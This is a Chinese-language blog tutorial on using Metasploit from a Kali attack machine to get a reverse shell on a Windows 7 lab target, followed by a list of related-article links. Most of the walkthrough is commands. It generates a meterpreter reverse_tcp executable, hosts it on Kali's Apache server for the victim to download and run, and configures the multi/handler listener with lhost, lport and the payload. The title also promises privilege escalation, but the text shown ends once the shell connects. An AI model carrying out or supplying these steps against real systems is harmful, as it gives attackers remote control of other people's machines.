利用msf实现反弹shell与提权(细节过程秒懂)
环境
攻击机:Kali ip:192.168.50.183
靶机:Win7(x64)
两者在同一个C段!!!!
生成payload
首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻
在线快速生成payload网站
这里的IP设置为KaliIP,端口不要与其他服务冲突
接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以)
把下载好的文件放至网页,由靶机win7通过访问网页下载
mv reverse.exe /var/www/html/
记得开启Kali的apache服务,我这里使用的是apache2
systemctl start apache2
设置监听
这样我们的payload就准备好了,接下来我们先设置监听
首先打开msfconsole模块
msfconsole
使用监听
use exploit/multi/handler
然后设置监听的payload,靶机是32位的可以把x64删掉
set payload windows/x64/meterpreter/reverse_tcp
接下来设置监听的IP和端口
show options
set lhost 192.168.50.183
set lport 4444
run
现在Kali处于监听状态,我们去靶机把payload下载运行
在靶机访问192.168.50.183/reverse.exe,下载好后运行文件
再返回Kali看到这个红色框框里的东西就代表已经反弹成功了
利用msf实现反弹shell与提权(细节过程秒懂)相关推荐
- 网络安全——使用反弹木马进行提权获取主机Shell
使用反弹木马进行提权获取主机Shell 第一步,打开网络拓扑,启动实验虚拟机,分别查看虚拟机IP地址: Kali Linux Linux Windows XP 第二步,使用命令nmap -sS 172 ...
- mysql反弹提权_MySQL数据库反弹端口连接提权
[51CTO.com原创稿件]在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令.在一般的情况下,也就放弃了.但其实可以 ...
- msf监听php反弹shell,使用msf进行反弹shell+内网渗透
首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令 反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口.下面开 ...
- Potato家族本地提权细节
本文结合POC源码,研究Potato家族本地提权细节 Feature or vulnerability 该提权手法的前提是拥有SeImpersonatePrivilege或SeAssignPrimar ...
- 获取Shell(提权)后的操作(windows、Linux)
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同. Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作 ...
- 提权命令_利用Linux文本操作命令ed进行提权
本文我将为大家介绍一个面向行的文本编辑器命令"ed",它主要用于生成,显示,更改和操作文本文件.所有ed命令都在行或行范围内执行操作:例如,"d"命令删除行:& ...
- 靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Conne ...
- linux 下ssh端口反弹,利用ssh隧道反弹shell
说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...
- WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权
前言 发现这个漏洞的时候, 笔者正在机房上课.正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑. 没想到就随手扫描到一台WIN ...
最新文章
- 钉钉、支付宝合种树,2-4天领证,限量9个名额
- Ueditor的两种定制方式
- libtorch调用模型
- ML_Logistic_Regression
- 区块链开发之搭建以太坊私有链
- PHP Hashtable实现源码分析
- 系统架构设计师 - 系统可靠性设计
- Linux/Mac修改conda源,方便安装pytorch等
- Secure CRT修改文件夹的颜色
- 程序员面试金典——9.6合法序号序列判断
- BGP Ethernet Virtual Private Network技术原理
- (十五)TcpClient
- DNS各地延迟排行榜
- Multi-Scale Context Aggregation By Dilated Convolutions
- CC2640R2F BLE5.0 蓝牙协议栈GAP Bond管理和LE安全连接
- 拼多多资深程序员带你了解 ”砍一刀“的设计与实现
- CentOS镜像介绍及下载
- Lua(二)数据类型+变量
- This is probably not a problem with npm. There is likely additional logging output above. 报错
- Windows 如何配置 scratch 3.0 GUI